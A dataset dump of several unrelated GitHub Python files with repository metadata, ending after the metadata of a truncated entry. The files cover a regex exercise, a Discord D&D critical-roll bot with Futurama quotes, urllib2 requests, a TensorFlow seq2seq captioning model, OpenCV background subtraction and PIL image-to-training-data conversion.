allonbrooks/cainiao | 14,010,183,359,511 | 96482d59fc470ab6a507c791b25a91165536081b | 6f80ca6891c240a7f58d1e2240117adcac5ff61a | /涉及嵌套分组与命名分组的正则练习一则.py | dd5780c4c4a9bb0b324f587997e406c31dbe11fc | []
| no_license | https://github.com/allonbrooks/cainiao | 73f739a6eb27befaa80ab8a5ad1f7d6238d56b1d | 705443ee87806187b61e13d59bd2ad465c10653e | refs/heads/master | 2020-04-28T00:41:40.782408 | 2019-03-10T13:21:05 | 2019-03-10T13:21:05 | 174,825,626 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/2/28 22t:02
# @Author : HandSome
# @File : 涉及嵌套分组与命名分组的正则练习一则.py
"""
有文本若干行如下,请写出正则匹配出以 param 开头的参数信息,输出格式为:字段名称、字段类型(不带尖括号)、是否可选(不带尖括号)和字段含义四部分内容。
#param nickname <str> 昵称
#param sex <int> <可选> 学员性别,1 男,2 女
"""
import re

# Sample lines to parse; each "#param" line holds a name, a type, an optional
# "<可选>" (optional) marker and a description.  The original defined this
# text (and the ``import re``) twice back to back; one definition suffices.
text = """
#param nickname <str> 昵称
#param sex <int> <可选> 学员性别,1 男,2 女
"""

# Named groups capture each field; the optional "<...>" marker is wrapped in
# a nullable outer group so lines without it still match (group 'opt' is then
# None).
p = re.compile(r'#param\s+(?P<name>[a-zA-Z]+)\s+<(?P<type>[a-zA-Z]+)>(\s+<(?P<opt>.+)>)?\s+(?P<desc>.+)')
result = p.finditer(text)
for i in result:
    print(i.group('name', 'type', 'opt', 'desc'))
| UTF-8 | Python | false | false | 977 | py | 35 | 涉及嵌套分组与命名分组的正则练习一则.py | 35 | 0.553846 | 0.528671 | 0 | 31 | 22.064516 | 105 |
sassafrastech/platemate | 1,159,641,176,987 | 31a6aca8c645fb8e93f86e04ca09381d809cc9e5 | db0ecb3c6a6ae58daa060a170d2d25068ff8c11c | /uploads.py | 015759bb79c4bbec8c0622c3a5ffb42b62b361cf | []
| no_license | https://github.com/sassafrastech/platemate | 85cf26dbd16eb07978c2f2be0d5d976c69b7298e | 22ae0bcaad5fed27a33122b93f41b9f1663ae6cb | refs/heads/master | 2021-08-02T15:41:59.171538 | 2021-07-22T19:28:37 | 2021-07-22T19:28:37 | 75,955,052 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | from management.run import run
from food.models import chiefs
import sys
# Example usage: "python uploads.py sandbox"
# NOTE(review): with a single CLI argument, sys.argv[1] and sys.argv[-1] are
# the same token, so the example runs operation="sandbox" in sandbox mode --
# confirm that is intended.
operation = sys.argv[1]
mode = sys.argv[-1]
# Kick off the upload pipeline; sandbox mode is on unless the last argument
# is exactly "real".
run(
    chief_module=chiefs.from_uploads,
    args={'sandbox': (mode != 'real')},
    operation=operation
)
| UTF-8 | Python | false | false | 273 | py | 38 | uploads.py | 30 | 0.703297 | 0.695971 | 0 | 13 | 20 | 44 |
computernerdzach/critGenBot | 16,527,034,181,855 | 728e7cb62af78519fa5bdc0da81958fd3e19b29f | eec317c5ef9b2c97bc67f3cd63bdb67430296e8d | /critGen.py | cb179d9a8b3f470b90a704c90f4ad4dfc5aa7cba | []
| no_license | https://github.com/computernerdzach/critGenBot | d4b9af1e90b412d067a84c8f208bb2859dd0fdba | 6ed3c86a8d36b6cc2f9fd22a6276bfeca60e4a5b | refs/heads/master | 2022-12-27T14:55:07.888190 | 2020-10-05T14:44:16 | 2020-10-05T14:44:16 | 286,359,246 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # bot.py
import os
import random
import discord
from dotenv import load_dotenv
# Load environment variables from a local .env file so the bot token is not
# hard-coded in source.
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')  # NOTE(review): None if DISCORD_TOKEN is unset -- verify before running the client
client = discord.Client()
# Text sent in response to "!help".  (Triple-quoted string: no comments can
# be interleaved inside it.)
help_message = """***Welcome to critGenBot!***
**To roll a critical hit or miss, type '!hit' or '!MISS'**
**To keep your roll secret, include the word 'whisper' and critGenBot will DM you the result.**
**To quote Bender from Futurama, type '!quote'**
**Help menu can be accessed by typing '!help'**"""
# Bender (Futurama) lines used as greetings.
greetings = ['Bite my shiny metal ass!',
             "I'm still alive, baby!",
             "Hey sexy mama. Wanna kill all humans?",
             "You're using critGenBot, the bot that does not advocate the COOL crime of robbery!",
             "Well, if jacking on will make strangers think I'm cool, I'll do it.",
             "Of all the friends I've had, you're the first.",
             "Shut up baby, I know it!"
             ]
# Bender lines used as sign-offs.
byes = ["Cheese it!",
        "I’m so embarrassed. I wish everybody else was dead.",
        "I got ants in my butt, and I needs to strut.",
        "Oh, no room for Bender, huh? Fine! I’ll go build my own lunar lander, with blackjack and hookers.",
        "Game’s over, losers! I have all the money. Compare your lives to mine and then kill yourselves.",
        "O’ cruel fate, to be thusly boned! Ask not for whom the bone bones—it bones for thee.",
        "We’ll soon stage an attack on technology worthy of being chronicled in an anthem by Rush!",
        "This is the worst kind of discrimination there is: the kind against me!",
        "Anything less than immortality is a complete waste of time.",
        "Hahahahaha. Oh wait you’re serious. Let me laugh even harder."
        ]
# Combined pool sampled by the "!quote" command.
quotes = greetings + byes
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
@client.event
async def on_message(message):
if message.author == client.user:
return
hits = ["Ludicrous Maneuver. All allies with Passive Perception 12 get +2 on next roll.",
"Late Timing. As an immediate action attack the same opponent at disadvantage.",
"Wide Open. Target incapacitated 1 round. No 1's or 2's on damage die.",
"Guarded Strike. +2AC for 1 round. No 1's or 2's on damage die.",
"Savage Chop. Ignore damage resistance. No 1's or 2's on damage die.",
"Retaliation. As an immediate action attack the same opponent. No1's or 2's on damage die.",
"Ruthless Assault. Extra damage die.",
"Defensive Strike. +4 AC for 1 round. Extra damage die.",
"Traumatic Injury. Ignore damage resistance. Extra damage die.",
"Victimized. Opponent provokes attacks of opportunity. Extra damage die.",
"Calamitous Fall. DC 13 DEX save or prone. Extra damage die.",
"Disoriented. DC 13 CON save or stunned for 1 round. Extra damage die.",
"Dirt in Eye. DC 13 WIS save or blinded for 1 round. Extra damage die.",
"Bleeder. 1d6 bleeding damage per round. Extra damage die.",
"Rout. Attacker has melee advantage and the target has disadvantage for 1round. Extra damage die.",
"The Gods Have Spoken. Roll twice and take the better result.",
"Momentum. As an immediate action attack the same opponent. Extra damagedie.",
"Great Hit. Ignore damage resistance. DoubleDamage.",
"Inspirational Display. All allies receive advantage on next roll. DoubleDamage.",
"Vertigo. Drop all items in hand. Knocked back 1d3 squares. DC 15DEX save or prone. Double Damage.",
"Perplexed Reaction. Target incapacitated 1 round,provokes attacks of opportunity. Double Damage.",
"...and Stay Down. Prone and stunned 1 round. DC 15 CON save or move halved until rest. Double Damage.",
"Astute Counter. As an immediate action attack the same opponent with advantage. DoubleDamage.",
"Impaled. 1d10 bleeding damage per round. Stunned 1 round. TripleDamage.",
"Conspiracy. The next hit landed on the foe is an automatic critical hit. Blinded 1 round. Triple Damage.",
"Demoralized. Prone. Stunned 2 rounds. TripleDamage.",
"Knockout. DC 16 CON save or unconscious. Prone. Stunned 2 rounds. Triple Damage.",
"Final Strike. DC 18 CON save or die. Prone 1d4 squares back. Stunned 3rounds. QuadrupleDamage.",
]
misses = ["Seppuku. Knocked prone. Disarmed 1d3 squares away. Stunned 2 rounds. Critical hit on self.",
"Total Failure. Knocked prone. Disarmed 1d3 squares away. Stunned 1 round. Critical hit on self.",
"Predictable Parry. Knocked prone. Disarmed. Stunned 1 round. Damage to ally (self).",
"Bloody Mess.Bleeding 1d6 per round. Disarmed. Stunned 1 round. Damage to self.",
"Gut Check. Damage to ally (self). Incapacitated for 1 round.",
"In Your Face. Damage to self. Incapacitated for 1 round.",
"Tipping the Scales. Opponent has advantage and attacker has disadvantage for 1 round.",
"Mighty Disarm. Disarmed 1d6 squares away. Disadvantage 1 round.",
"Terrible Maneuver. Nearest opponent gets a free attack with advantage as an immediate action.",
"The Bigger They Are... Knocked back 1d3 squares before falling prone. ",
"Butterfingers. Disarmed. Disadvantage on next attack roll.",
"Dropped Guard. Nearest opponent gets a free attack as an immediate action, if possible",
"Vision Impairment. Blinded 1 round.",
"Loss of Resolve. The next saving throw in combat automatically fails.",
"Partial Blow. Half damage to self.",
"Wide Open. Provoke attack of opportunity from closest melee opponent, if possible.",
"Poor Karma. The next saving throw in combat is at disadvantage.",
"Slow to Respond. No bonus action or reaction next round.",
"Tough Recovery. Go last in initiative next round.",
"Nothing unusual happens.",
]
whisper_text = f'{client.user} whispered result to {message.author}'
if '!hit' in message.content.lower():
response = random.choice(hits)
if 'whisper' in message.content.lower():
await message.author.send(response)
await message.channel.send(whisper_text)
print(f'{message.author} whispered a hit roll\n ' + response)
else:
await message.channel.send(response)
print(f'{message.author} made a hit roll\n ' + response)
elif '!miss' in message.content.lower():
response = random.choice(misses)
if 'whisper' in message.content.lower():
await message.author.send(response)
await message.channel.send(whisper_text)
print(f'{message.author} whispered a miss roll\n ' + response)
else:
await message.channel.send(response)
print(f'{message.author} made a miss roll\n ' + response)
elif '!help' in message.content.lower():
await message.channel.send(help_message)
print(f'{message.author} asked for help.')
elif '!quote' in message.content.lower():
bender_quote = random.choice(quotes)
await message.channel.send(bender_quote)
print(f'{message.author} quoted Bender.\n ' + bender_quote)
elif "!bye" in message.content.lower() or "!goodbye" in message.content.lower():
so_long = random.choice(byes)
await message.channel.send(so_long)
print(f'{message.author} dismissed critGenBot\n ' + so_long)
await client.close()
client.run(TOKEN)
| UTF-8 | Python | false | false | 7,759 | py | 2 | critGen.py | 1 | 0.642608 | 0.633828 | 0 | 130 | 58.576923 | 119 |
liulong3712/pythonstudy | 13,228,499,295,450 | fe9d92fe41477f141a00f5c9731ce4ad4261cddd | 75ee9dbfdad7760e059fd078dabc0a2efce157d4 | /pythonstudy/python/study/test/test1.py | 61df2b0f96409fc931c0577bcde15c8898b1fe51 | []
| no_license | https://github.com/liulong3712/pythonstudy | dcba1076866903bb05aec198b3f54f641106bc06 | eec9f41cab101100955853730da596878fbe94d5 | refs/heads/master | 2021-01-19T01:12:10.035778 | 2016-06-22T10:33:32 | 2016-06-22T10:33:32 | 61,365,059 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import urllib2
#https://www.baidu.com/s?wd=%E6%B5%8B%E8%AF%95
import chardet
if __name__ == "__main__":
import urllib
url = 'http://www.baidu.com/s'
values = {'wd':'测试',
's':'123'}
data = urllib.urlencode(values) # 编码工作
print data
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = { 'User-Agent' : user_agent }
req = urllib2.Request(url,data,headers) # 发送请求同时传data表单
print req.get_full_url()
response = urllib2.urlopen(req) #接受反馈的信息
the_page = response.read() #读取反馈的内容
full_url = url + '?' + data
print urllib2.urlopen(full_url).read()
#print the_page
| UTF-8 | Python | false | false | 731 | py | 26 | test1.py | 19 | 0.600297 | 0.573551 | 0 | 21 | 31 | 65 |
Sid11/Tap_Search | 13,108,240,191,655 | 907ef57bad1c2a2fc4bbd266653dfbcc449e2536 | 7c3cd244e988d29189494302f0c265e05b8c8c0d | /website/admin.py | 4f36e62fdd977fa4ce311b2afeeebab1454a984a | []
| no_license | https://github.com/Sid11/Tap_Search | 983ccc0f6e25ff9907949b34bb99fdff9483a8a6 | 56786d73b369ff023220cbcf737e3223dd9927b5 | refs/heads/master | 2022-12-09T23:22:02.559607 | 2019-12-01T15:52:55 | 2019-12-01T15:52:55 | 225,105,874 | 0 | 0 | null | false | 2022-12-08T03:14:57 | 2019-12-01T04:22:32 | 2019-12-01T15:52:58 | 2022-12-08T03:14:57 | 33,815 | 0 | 0 | 4 | Batchfile | false | false | from django.contrib import admin
from .models import Post, Image
admin.site.register([Post,Image])
# Register your models here.
| UTF-8 | Python | false | false | 128 | py | 12 | admin.py | 6 | 0.789063 | 0.789063 | 0 | 4 | 31 | 33 |
iparinile/Learning_Lutz_Learning_Python | 10,299,331,610,025 | b4e880c5d938696765fb58b9c7112b81ae3000ea | 03bd051037f1d0a7ce4fc1364f6cb3f1b75d1389 | /Day 2/files.py | 7864861ae991aad4b3069c90cf8d3a9d47cb1a88 | []
| no_license | https://github.com/iparinile/Learning_Lutz_Learning_Python | 7c698b1c788b70662e0b890afe542316a1730d4e | 2ef81d7057f2b3b657e2e1ef7311d7178273037d | refs/heads/master | 2022-11-06T21:48:15.464526 | 2020-07-20T13:05:30 | 2020-07-20T13:05:30 | 275,144,729 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | f = open('data.txt', 'w') # Создать новый файл в режиме записи ('w')
f.write('Hello\n') # Записать в него строки символов
f.write('world\n')
f.close() # Закрыть для сбрасывания буферов вывода на диск
f = open('data.txt', 'r') # 'r' (чтение) - стандартный режим обработки
text = f.read() # Прочитать все содержимое файла в строку
print(text)
# Hello
# world
print(text.split()) # Содержимое файла - всегда строка
# ['Hello', 'world']
for line in open('data.txt'):
print(line)
import struct
packed = struct.pack('>i4sh', 7, b'spam', 9) # Создание упакованных двоичных данных
print(packed) # b'\x00\x00\x00\x07spam\x00\t' # 10 байтов, не объекты и не текст
file = open('data.bin', 'wb') # Открыть двоичный файл для записи
file.write(packed) # Записать упакованные двоичные данные
file.close()
data = open('data.bin', 'rb').read() # Открыть/прочитать двоичный файл данных
print(data) # b'\x00\x00\x00\x07spam\x00\t'
print(data[4:8]) # b'spam' # Нарезать байты в середине
print(list(data)) # [0, 0, 0, 7, 115, 112, 97, 109, 0, 9] # Последовательность 8-битных байтов
print(struct.unpack('>i4sh', data)) # (7, b'spam', 9) # Снова распаковать в объекты
| UTF-8 | Python | false | false | 1,595 | py | 11 | files.py | 11 | 0.676271 | 0.635593 | 0.008475 | 27 | 42.703704 | 97 |
namitav1997/CPSC-8810-Deep-Learning | 8,521,215,126,509 | 99cf7e69a12f622588f3d26c628f1bdf96ace886 | 84fc3401826b32af7fff1c68f02bf3ea43f62e75 | /HW2/HW2_1/ncheruk_seq2seq_model.py | ec28b1c617a76c83c270fd1bb88281b5a9e3aa01 | []
| no_license | https://github.com/namitav1997/CPSC-8810-Deep-Learning | 5537354afcfa9693eeb1229627e3ec9d43ae9af8 | 225d9e8210062b66a193f2b47c75757d009699b3 | refs/heads/master | 2022-05-31T03:56:13.832055 | 2020-04-30T23:27:11 | 2020-04-30T23:27:11 | 245,570,007 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Namita Vagdevi Cherukuru
#HW 2: Deep Learning (CPSC 8810)
#ncheruk@clemson.edu
import tensorflow as tenf
import numpy as nump
import random
class Ncheruk_Seq2Seq_Model():
def __init__(self, rnn_sz, numof_layers, dim_vft, embed_size,
lr_rate, word_2_i, mode, max_gradnorm,
atten, bsearch, bsize,
maxer_step, maxdecstep):
tenf.set_random_seed(5677)
nump.random.seed(5677)
random.seed(5677)
self.word_2_idx = word_2_i
self.mode = mode
self.max_gradient_norm = max_gradnorm
self.max_decoder_steps = maxdecstep
self.rnn_size = rnn_sz
self.num_layers = numof_layers
self.dim_video_feat = dim_vft
self.embedding_size = embed_size
self.learning_rate = lr_rate
self.use_attention = atten
self.beam_search = bsearch
self.beam_size = bsize
self.max_encoder_steps = maxer_step
self.vocab_size = len(self.word_2_idx)
self.building_model()
def crte_rnn_cell(self):
def sgle_rnn_cell():
single_cell = tenf.contrib.rnn.GRUCell(self.rnn_size)
cell = tenf.contrib.rnn.DropoutWrapper(single_cell, output_keep_prob=self.prob_placeholder, seed=9487)
return cell
cell = tenf.contrib.rnn.MultiRNNCell([sgle_rnn_cell() for _ in range(self.num_layers)])
return cell
def building_model(self):
tenf.set_random_seed(5677)
nump.random.seed(5677)
random.seed(5677)
self.encdr_inputs = tenf.placeholder(tenf.float32, [None, None, None], name='encoder_inputs')
self.encdr_inp_length = tenf.placeholder(tenf.int32, [None], name='encoder_inputs_length')
self.batch_sz = tenf.placeholder(tenf.int32, [], name='batch_size')
self.prob_placeholder = tenf.placeholder(tenf.float32, name='keep_prob_placeholder')
self.dec_targets = tenf.placeholder(tenf.int32, [None, None], name='decoder_targets')
self.der_target_len = tenf.placeholder(tenf.int32, [None], name='decoder_targets_length')
self.max_sequence_length = tenf.reduce_max(self.der_target_len, name='max_target_len')
self.mask = tenf.sequence_mask(self.der_target_len, self.max_sequence_length, dtype=tenf.float32,
name='masks')
with tenf.variable_scope('decoder', reuse=tenf.AUTO_REUSE):
encoder_inputs_length = self.encdr_inp_length
if self.beam_search:
print("Using beamsearch decoding...")
encoder_outputs = tenf.contrib.seq2seq.tile_batch(encoder_outputs, multiplier=self.beam_size)
encoder_state = tenf.contrib.framework.nest.map_structure(
lambda s: tenf.contrib.seq2seq.tile_batch(s, self.beam_size), encoder_state)
encoder_inputs_length = tenf.contrib.seq2seq.tile_batch(self.encdr_inp_length,
multiplier=self.beam_size)
batch_size = self.batch_sz if not self.beam_search else self.batch_sz * self.beam_size
projection_layer = tenf.layers.Dense(units=self.vocab_size,
kernel_initializer=tenf.truncated_normal_initializer(mean=0.0, stddev=0.1,
seed=9487))
embedding_decoder = tenf.Variable(tenf.random_uniform([self.vocab_size, self.rnn_size], -0.1, 0.1, seed=9487),
name='embedding_decoder')
decoder_cell = self.crte_rnn_cell()
if self.use_attention:
attention_mechanism = tenf.contrib.seq2seq.BahdanauAttention(
num_units=self.rnn_size,
memory=encoder_outputs,
normalize=True,
memory_sequence_length=encoder_inputs_length)
decoder_cell = tenf.contrib.seq2seq.AttentionWrapper(
cell=decoder_cell,
attention_mechanism=attention_mechanism,
attention_layer_size=self.rnn_size,
name='Attention_Wrapper')
decoder_initial_state = decoder_cell.zero_state(batch_size=batch_size, dtype=tenf.float32).clone(
cell_state=encoder_state)
else:
decoder_initial_state = encoder_state
output_layer = tenf.layers.Dense(self.vocab_size,
kernel_initializer=tenf.truncated_normal_initializer(mean=0.0, stddev=0.1,
seed=9487))
ending = tenf.strided_slice(self.dec_targets, [0, 0], [self.batch_sz, -1], [1, 1])
decoder_inputs = tenf.concat([tenf.fill([self.batch_sz, 1], self.word_2_idx['<bos>']), ending], 1)
start_tokens = tenf.ones([self.batch_sz, ], tenf.int32) * self.word_2_idx['<bos>']
end_token = self.word_2_idx['<eos>']
if self.beam_search:
inference_decoder = tenf.contrib.seq2seq.BeamSearchDecoder(
cell=decoder_cell,
embedding=embedding_decoder,
start_tokens=start_tokens,
end_token=end_token,
initial_state=decoder_initial_state,
beam_width=self.beam_size,
output_layer=output_layer)
else:
inference_decoding_helper = tenf.contrib.seq2seq.GreedyEmbeddingHelper(
embedding=embedding_decoder,
start_tokens=start_tokens,
end_token=end_token)
inference_decoder = tenf.contrib.seq2seq.BasicDecoder(
cell=decoder_cell,
helper=inference_decoding_helper,
initial_state=decoder_initial_state,
output_layer=output_layer)
inference_decoder_outputs, _, _ = tenf.contrib.seq2seq.dynamic_decode(
decoder=inference_decoder,
maximum_iterations=self.max_decoder_steps)
if self.beam_search:
self.decoder_predict_decode = inference_decoder_outputs.predicted_ids
self.decoder_predict_logits = inference_decoder_outputs.beam_search_decoder_output
else:
self.decoder_predict_decode = tenf.expand_dims(inference_decoder_outputs.sample_id, -1)
self.decoder_predict_logits = inference_decoder_outputs.rnn_output
with tenf.variable_scope('encoder', reuse=tenf.AUTO_REUSE):
enr_inputs_flatten = tenf.reshape(self.encdr_inputs, [-1, self.dim_video_feat])
enr_inputs_embed = tenf.layers.dense(enr_inputs_flatten, self.embedding_size, use_bias=True)
enr_inputs_embed = tenf.reshape(enr_inputs_embed,
[self.batch_sz, self.max_encoder_steps, self.rnn_size])
encoder_cell = self.crte_rnn_cell()
encoder_outputs, encoder_state = tenf.nn.dynamic_rnn(
encoder_cell, enr_inputs_embed,
sequence_length=self.encdr_inp_length,
dtype=tenf.float32)
self.saver = tenf.train.Saver(tenf.global_variables(), max_to_keep=50)
decoder_inputs_embedded = tenf.nn.embedding_lookup(embedding_decoder, decoder_inputs)
training_helper = tenf.contrib.seq2seq.TrainingHelper(
inputs=decoder_inputs_embedded,
sequence_length=self.der_target_len,
time_major=False, name='training_helper')
training_decoder = tenf.contrib.seq2seq.BasicDecoder(
cell=decoder_cell, helper=training_helper,
initial_state=decoder_initial_state,
output_layer=output_layer)
decoder_outputs, _, _ = tenf.contrib.seq2seq.dynamic_decode(
decoder=training_decoder,
impute_finished=True,
maximum_iterations=self.max_sequence_length)
self.decoder_logits_train = tenf.identity(decoder_outputs.rnn_output)
self.decoder_predict_train = tenf.argmax(self.decoder_logits_train, axis=-1, name='decoder_pred_train')
self.loss = tenf.contrib.seq2seq.sequence_loss(
logits=self.decoder_logits_train,
targets=self.dec_targets,
weights=self.mask)
tenf.summary.scalar('loss', self.loss)
self.summary_op = tenf.summary.merge_all()
optimizer = tenf.train.AdamOptimizer(self.learning_rate)
trainable_params = tenf.trainable_variables()
gradients = tenf.gradients(self.loss, trainable_params)
clip_gradients, _ = tenf.clip_by_global_norm(gradients, self.max_gradient_norm)
self.train_op = optimizer.apply_gradients(zip(clip_gradients, trainable_params))
def train(self, sess, encoder_inputs, encoder_inputs_length, decoder_targets, decoder_targets_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.dec_targets: decoder_targets,
self.der_target_len: decoder_targets_length,
self.prob_placeholder: 0.8,
self.batch_sz: len(encoder_inputs)}
_, loss, summary = sess.run([self.train_op, self.loss, self.summary_op], feed_dict=feed_dict)
return loss, summary
def infer(self, sess, encoder_inputs, encoder_inputs_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.prob_placeholder: 1.0,
self.batch_sz: len(encoder_inputs)}
predict, logits = sess.run([self.decoder_predict_decode, self.decoder_predict_logits], feed_dict=feed_dict)
return predict, logits
def eval(self, sess, encoder_inputs, encoder_inputs_length, decoder_targets, decoder_targets_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.dec_targets: decoder_targets,
self.der_target_len: decoder_targets_length,
self.prob_placeholder: 1.0,
self.batch_sz: len(encoder_inputs)}
loss, summary = sess.run([self.loss, self.summary_op], feed_dict=feed_dict)
return loss, summary
| UTF-8 | Python | false | false | 10,964 | py | 8 | ncheruk_seq2seq_model.py | 5 | 0.568862 | 0.558282 | 0 | 230 | 45.66087 | 123 |
rs3603/Traffic-Intersection-Research | 4,947,802,368,118 | 450313b1ce263bbdd9669615c6930cb84fb24c79 | f07601785f6c8c8b9abcef9d521dddfb4a347fcb | /trial_backsub1.py | b6a25d99069661ab916e8a753e93fc2d144cae76 | []
| no_license | https://github.com/rs3603/Traffic-Intersection-Research | 0f929fe4d2134648ebdd2a4c194f9df1f9d8bdd5 | 493e78297e49e1b8112b5356efda3250e3ee10ab | refs/heads/master | 2021-01-12T02:36:17.545410 | 2017-01-05T03:24:40 | 2017-01-05T03:24:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import cv2
#cap = cv2.VideoCapture(1)
cap = cv2.VideoCapture('rec_out.wmv')
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
fgbg = cv2.createBackgroundSubtractorMOG2(history=50000, varThreshold = 1)
ret, framebg = cap.read()
framebg = (cv2.cvtColor(framebg, cv2.COLOR_BGR2GRAY))
'''
ret, framebg1 = cap.read()
framebg1 = cv2.equalizeHist(cv2.cvtColor(framebg1, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
'''
while(1):
ret, frame = cap.read()
cap.set(cv2.CAP_PROP_FPS,200)
img_gray = (cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY))
#print img_yuv
# equalize the histogram of the Y channel
#img_yuv[:,:,0] = cv2.equalizeHist(img_yuv[:,:,0])
# convert the YUV image back to RGB format
#frame = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)
fgmask = abs(img_gray-framebg)%255
#indices = fgmask > 0
#fgmask[indices] = 255
#print fgmask.astype(dtype='uint8')
se = np.ones((7,7), dtype='uint8')
kernel = np.ones((7,7),np.uint8)
fgmask = cv2.morphologyEx(fgmask.astype(dtype = 'uint8'), cv2.MORPH_OPEN, se)
im2, contours, hierarchy = cv2.findContours(fgmask.astype(dtype = 'uint8'),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
indices = fgmask>200
fgmask[indices] = 0
thresh = cv2.threshold(fgmask, 5, 255, cv2.THRESH_BINARY)[1]
threshnew = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, se)
im2, contours, hierarchy = cv2.findContours(threshnew,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
rect = cv2.boundingRect(c)
if cv2.contourArea(c)>300:
#print cv2.contourArea(c)
x,y,w,h = rect
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
#cv2.putText(frame,'Car',(x+w+10,y+h),0,0.3,(0,255,0))
if cv2.contourArea(c)>5 and cv2.contourArea(c)<70 and rect[2]>5 and rect[3]>5:
#print cv2.contourArea(c)
x,y,w,h = rect
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#cv2.putText(frame,'Pedestrian',(x+w+10,y+h),0,0.3,(0,0,255))
cv2.imshow("Show",frame)
#print len(contours)
#cv2.drawContours(fgmask, contours, 3, (0,255,0), 3)
se = np.ones((7,7), dtype='uint8')
#cv2.imshow('frame',fgmask)
#cv2.imshow('frame1',im2)
k = cv2.waitKey(20) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
| UTF-8 | Python | false | false | 3,173 | py | 6 | trial_backsub1.py | 5 | 0.639458 | 0.576741 | 0 | 81 | 37.17284 | 121 |
rymoah/CoInGP | 9,483,287,834,114 | a910694c7f4e0c94b8a6c223a70b9f37d2179be4 | 24ac5fe4c900e3279a1f602f34056ec50d4881c0 | /src/img_convert_moore.py | 1900d28230769dbcf4a69ade8ae8b63e8d0109fd | [
"MIT"
]
| permissive | https://github.com/rymoah/CoInGP | c5be2eb92ecb65a31f01fb1f9efdbbe00cf171d6 | d9906f7d21211d11e23e085734f7e71aab7d59ee | refs/heads/main | 2023-04-08T04:14:05.600481 | 2021-04-25T10:44:51 | 2021-04-25T10:44:51 | 357,918,237 | 1 | 0 | null | false | 2021-04-25T10:44:52 | 2021-04-14T13:38:26 | 2021-04-25T10:41:29 | 2021-04-25T10:44:51 | 91 | 0 | 0 | 0 | C++ | false | false | from PIL import Image
import random
import math
import sys
N_PIXELS = 100
IMAGE = sys.argv[1]
def window(img, x, y, radius):
inputs = []
outputs = None
for i in range(x - radius, x + radius + 1):
for j in range(y - radius, y + radius + 1):
if i != x or j != y:
inputs.append(img.getpixel((i, j))[0])
else:
outputs = img.getpixel((i, j))[0]
return inputs, outputs
def slide_window(img, radius, test):
cases = []
for x in range(radius, img.width - radius):
for y in range(radius, img.height - radius):
overlap = [(i, j) for i in range(x-radius, x+radius+1)
for j in range(y-radius, y+radius+1) if (i, j) in tests]
if overlap == []:
cases.append(window(img, x, y, radius))
return cases
def make_test(img, radius):
tests = []
random.seed(a=0)
for x in range(radius, img.width - radius, radius + 1):
ys = random.sample(range(radius, img.height - radius, radius + 1),
N_PIXELS)
for y in ys:
tests.append((x, y))
return tests
im = Image.open(IMAGE).convert('LA')
im2 = Image.open(IMAGE).convert('LA')
radius = 1
tests = make_test(im, radius)
for point in tests:
im.putpixel(point, (0, 255))
im.save('greyscale.png')
train = slide_window(im, 1, tests)
f = open("train.txt", "w")
for case in train:
for i in case[0]:
f.write(f"{i} ")
f.write(f"{case[1]}\n")
f.close()
f = open("test.txt", "w")
test_values = []
for x, y in tests:
a, b = window(im2, x, y, radius)
for i in a:
f.write(f"{i} ")
f.write(f"{b}\n")
f.close()
f = open("points.txt", "w")
for x, y in tests:
f.write(f"{x} {y}\n")
f.close()
f = open("baselines.txt", "w")
error = 0
for case in train:
prediction = sum(case[0])//len(case[0])
error += (prediction - case[1])**2
rmse = math.sqrt(error/len(train))
f.write(f"{rmse}\n")
error = 0
for x, y in tests:
a, b = window(im2, x, y, radius)
prediction = sum(a)//len(a)
error += (prediction - b)**2
im.putpixel((x, y), (prediction, 255))
rmse = math.sqrt(error/len(tests))
f.write(f"{rmse}\n")
f.close()
im.save("baseline.png")
| UTF-8 | Python | false | false | 2,247 | py | 13 | img_convert_moore.py | 10 | 0.552737 | 0.537606 | 0 | 92 | 23.423913 | 79 |
NicolasSimard/BlitzChat | 9,861,244,919,642 | d1f465c6bcd607215c351c6e17831f186de3ac63 | c4c2ad7cad2dd9510602b3d1e0ad6da4339e1469 | /youtube/livebroadcast.py | 349d20600639f2a79344f19a705ce96d81bd9f86 | []
